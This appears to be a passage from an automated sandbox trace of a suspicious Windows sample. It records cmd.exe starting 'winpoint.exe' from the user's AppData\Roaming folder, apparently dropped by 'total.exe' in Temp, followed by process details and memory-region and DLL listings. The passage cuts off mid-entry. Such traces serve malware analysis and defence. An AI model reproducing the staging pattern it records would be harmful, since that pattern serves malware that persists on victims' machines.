(_String1="start", _String2="VOL") returned -3 [0160.428] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0160.428] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0160.428] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0160.428] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0160.428] _wcsicmp (_String1="start", _String2="START") returned 0 [0160.431] GetStdHandle (nStdHandle=0xfffffff6) returned 0x198 [0160.431] GetStdHandle (nStdHandle=0xfffffff5) returned 0x1a0 [0160.431] GetStdHandle (nStdHandle=0xfffffff4) returned 0x1a0 [0160.431] 
_wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="DIR") returned -1 [0160.431] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="ERASE") returned -2 [0160.431] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="DEL") returned -1 [0160.431] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="TYPE") returned -17 [0160.431] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="COPY") returned -53 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="CD") returned -42 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="CHDIR") returned -46 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="RENAME") returned -15 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="REN") returned -15 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="ECHO") returned -2 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="SET") returned -16 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="PAUSE") returned -13 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="DATE") returned -1 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="TIME") returned -17 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="PROMPT") returned -13 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="MD") returned -10 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK 
IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="MKDIR") returned -10 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="RD") returned -15 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="RMDIR") returned -15 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="PATH") returned -13 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="GOTO") returned -4 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="SHIFT") returned -16 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="CLS") returned -50 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="CALL") returned -39 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="VERIFY") returned -19 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="VER") returned -19 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="VOL") returned -19 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="EXIT") returned -2 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="SETLOCAL") returned -16 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="ENDLOCAL") returned -2 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="TITLE") returned -17 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="START") returned -16 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", 
_String2="DPATH") returned -1 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="KEYS") returned -8 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="MOVE") returned -10 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="PUSHD") returned -13 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="POPD") returned -13 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="ASSOC") returned 2 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="FTYPE") returned -3 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="BREAK") returned 1 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="COLOR") returned -53 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="MKLINK") returned -10 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="FOR") returned -3 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="IF") returned -6 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="REM") returned -15 [0160.433] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0160.433] SetErrorMode (uMode=0x0) returned 0x8001 [0160.433] SetErrorMode (uMode=0x1) returned 0x0 [0160.433] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\.", nBufferLength=0x208, lpBuffer=0x330c70, lpFilePart=0x212db0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming", lpFilePart=0x212db0*="Roaming") returned 0x27 [0160.433] SetErrorMode (uMode=0x8001) returned 0x1 [0160.433] 
NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\.") returned 1 [0160.434] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a950640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0160.436] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.436] FindFirstFileExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", fInfoLevelId=0x1, lpFindFileData=0x212b4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x212b4c) returned 0x330e38 [0160.437] FindClose (in: hFindFile=0x330e38 | out: hFindFile=0x330e38) returned 1 [0160.437] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0160.437] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0160.437] GetStartupInfoW (in: lpStartupInfo=0x213064 | out: lpStartupInfo=0x213064*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x198, hStdOutput=0x1a0, hStdError=0x1a0)) [0160.437] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x213158 | out: lpAttributeList=0x0, lpSize=0x213158) returned 0 [0160.437] GetLastError () returned 0x7a [0160.437] InitializeProcThreadAttributeList (in: lpAttributeList=0x330e38, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x213158 | out: lpAttributeList=0x330e38, lpSize=0x213158) returned 1 [0160.437] UpdateProcThreadAttribute (in: lpAttributeList=0x330e38, dwFlags=0x0, Attribute=0x60001, lpValue=0x213130, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x330e38, lpPreviousValue=0x0) returned 1 [0160.437] CreateProcessW (in: lpApplicationName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", 
lpCommandLine="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2130e8*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x198, hStdOutput=0x1a0, hStdError=0x1a0), lpProcessInformation=0x213140 | out: lpCommandLine="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" ", lpProcessInformation=0x213140*(hProcess=0x78, hThread=0x74, dwProcessId=0x870, dwThreadId=0x650)) returned 1 [0160.440] DeleteProcThreadAttributeList (in: lpAttributeList=0x330e38 | out: lpAttributeList=0x330e38) [0160.440] GetLastError () returned 0x714 [0160.440] ResumeThread (hThread=0x74) returned 0x0 [0160.440] CloseHandle (hObject=0x74) returned 1 [0160.440] CloseHandle (hObject=0x78) returned 1 [0160.440] _get_osfhandle (_FileHandle=1) returned 0x1a0 [0160.440] SetConsoleMode (hConsoleHandle=0x1a0, dwMode=0x0) returned 0 [0160.440] _get_osfhandle (_FileHandle=1) returned 0x1a0 [0160.440] GetConsoleMode (in: hConsoleHandle=0x1a0, lpMode=0x4a9441ac | out: lpMode=0x4a9441ac) returned 0 [0160.440] _get_osfhandle (_FileHandle=0) returned 0x198 [0160.440] GetConsoleMode (in: hConsoleHandle=0x198, lpMode=0x4a9441b0 | out: lpMode=0x4a9441b0) returned 0 [0160.440] GetConsoleOutputCP () returned 0x1b5 [0160.441] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a944260 | out: lpCPInfo=0x4a944260) returned 1 [0160.441] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.441] exit (_Code=0) Process: id = "7" image_name = "winpoint.exe" filename = "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winpoint.exe" page_root = "0x19c4d000" os_pid = "0x870" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" 
parent_id = "6" os_parent_pid = "0x890" cmd_line = "\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " cur_dir = "C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1105 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1106 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1107 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1108 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1109 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1110 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1111 start_va = 0x400000 end_va = 0x4b9fff entry_point = 0x400000 region_type = mapped_file name = "winpoint.exe" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winpoint.exe") Region: id = 1112 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = 
"\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1113 start_va = 0x77d30000 end_va = 0x77eaffff entry_point = 0x77d30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1114 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1115 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1116 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1117 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1118 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1119 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1120 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1121 start_va = 0x300000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1122 start_va = 0x755d0000 end_va = 0x755d7fff entry_point = 0x755d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1123 start_va = 0x755e0000 end_va = 0x7563bfff entry_point = 0x755e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1124 
start_va = 0x75640000 end_va = 0x7567efff entry_point = 0x75640000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1228 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1229 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1230 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1231 start_va = 0x620000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1232 start_va = 0x75280000 end_va = 0x75303fff entry_point = 0x75280000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1233 start_va = 0x75310000 end_va = 0x7539bfff entry_point = 0x75310000 region_type = mapped_file name = "odbc32.dll" filename = "\\Windows\\SysWOW64\\odbc32.dll" (normalized: "c:\\windows\\syswow64\\odbc32.dll") Region: id = 1234 start_va = 0x753a0000 end_va = 0x754befff entry_point = 0x753a0000 region_type = mapped_file name = "mfc42u.dll" filename = "\\Windows\\SysWOW64\\mfc42u.dll" (normalized: "c:\\windows\\syswow64\\mfc42u.dll") Region: id = 1235 start_va = 0x756d0000 end_va = 0x756e4fff entry_point = 0x756d0000 region_type = mapped_file name = "scarddlg.dll" filename = "\\Windows\\SysWOW64\\SCardDlg.dll" (normalized: "c:\\windows\\syswow64\\scarddlg.dll") Region: id = 1236 start_va = 
0x75700000 end_va = 0x75722fff entry_point = 0x75700000 region_type = mapped_file name = "winscard.dll" filename = "\\Windows\\SysWOW64\\WinSCard.dll" (normalized: "c:\\windows\\syswow64\\winscard.dll") Region: id = 1237 start_va = 0x75880000 end_va = 0x7588bfff entry_point = 0x75880000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1238 start_va = 0x75890000 end_va = 0x758effff entry_point = 0x75890000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1239 start_va = 0x75a10000 end_va = 0x75a55fff entry_point = 0x75a10000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1240 start_va = 0x75a60000 end_va = 0x75bbbfff entry_point = 0x75a60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1241 start_va = 0x75bc0000 end_va = 0x75c6bfff entry_point = 0x75bc0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1242 start_va = 0x75c70000 end_va = 0x75c81fff entry_point = 0x75c70000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1243 start_va = 0x75c90000 end_va = 0x75d9ffff entry_point = 0x75c90000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1244 start_va = 0x75f20000 end_va = 0x7600ffff entry_point = 0x75f20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" 
(normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1245 start_va = 0x76020000 end_va = 0x76046fff entry_point = 0x76020000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1246 start_va = 0x76130000 end_va = 0x762ccfff entry_point = 0x76130000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1247 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x76650000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1248 start_va = 0x76780000 end_va = 0x7687ffff entry_point = 0x76780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1249 start_va = 0x774d0000 end_va = 0x7756cfff entry_point = 0x774d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1250 start_va = 0x77600000 end_va = 0x7768ffff entry_point = 0x77600000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1251 start_va = 0x777f0000 end_va = 0x77808fff entry_point = 0x777f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1252 start_va = 0x77810000 end_va = 0x7789efff entry_point = 0x77810000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1253 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x0 region_type = private name = 
"private_0x0000000077930000" filename = "" Region: id = 1254 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x0 region_type = private name = "private_0x0000000077a50000" filename = "" Region: id = 1255 start_va = 0x77d00000 end_va = 0x77d09fff entry_point = 0x77d00000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1256 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1257 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1258 start_va = 0x720000 end_va = 0x8a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 1259 start_va = 0x76050000 end_va = 0x7611bfff entry_point = 0x76050000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1260 start_va = 0x77790000 end_va = 0x777effff entry_point = 0x77790000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1272 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1273 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1274 start_va = 0x210000 end_va = 0x216fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1275 start_va = 0x220000 end_va = 0x221fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1276 start_va = 0x230000 end_va = 0x23afff entry_point = 0x230000 
region_type = mapped_file name = "odbcint.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\odbcint.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\odbcint.dll.mui") Region: id = 1277 start_va = 0x240000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1278 start_va = 0x2c0000 end_va = 0x2c7fff entry_point = 0x2c0000 region_type = mapped_file name = "mfc42u.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\MFC42u.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mfc42u.dll.mui") Region: id = 1279 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x2d0000 region_type = mapped_file name = "scarddlg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\SCardDlg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\scarddlg.dll.mui") Region: id = 1280 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1281 start_va = 0x8b0000 end_va = 0xa30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 1282 start_va = 0xa40000 end_va = 0x1e3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 1283 start_va = 0x1fe0000 end_va = 0x201ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 1284 start_va = 0x2020000 end_va = 0x2412fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002020000" filename = "" Region: id = 1285 start_va = 0x75240000 end_va = 0x75277fff entry_point = 0x75240000 region_type = mapped_file name = "odbcint.dll" filename = "\\Windows\\SysWOW64\\odbcint.dll" (normalized: "c:\\windows\\syswow64\\odbcint.dll") Region: id = 1287 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1288 start_va = 0x4c0000 end_va = 
0x543fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1289 start_va = 0x1e40000 end_va = 0x1eeafff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 1290 start_va = 0x751e0000 end_va = 0x751e7fff entry_point = 0x751e0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1292 start_va = 0x778f0000 end_va = 0x77924fff entry_point = 0x778f0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1293 start_va = 0x75a00000 end_va = 0x75a05fff entry_point = 0x75a00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1294 start_va = 0x2420000 end_va = 0x25dffff entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 1295 start_va = 0x751c0000 end_va = 0x751d6fff entry_point = 0x751c0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1296 start_va = 0x751b0000 end_va = 0x751bafff entry_point = 0x751b0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1298 start_va = 0x750c0000 end_va = 0x751aafff entry_point = 0x750c0000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1302 start_va = 0x4c0000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1304 start_va = 0x750a0000 end_va = 0x750acfff entry_point = 0x750a0000 region_type = 
mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 1305 start_va = 0x75920000 end_va = 0x75976fff entry_point = 0x75920000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1306 start_va = 0x76880000 end_va = 0x774c9fff entry_point = 0x76880000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1307 start_va = 0x2420000 end_va = 0x251ffff entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 1308 start_va = 0x25a0000 end_va = 0x25dffff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 1309 start_va = 0x755c0000 end_va = 0x755c2fff entry_point = 0x755c0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: 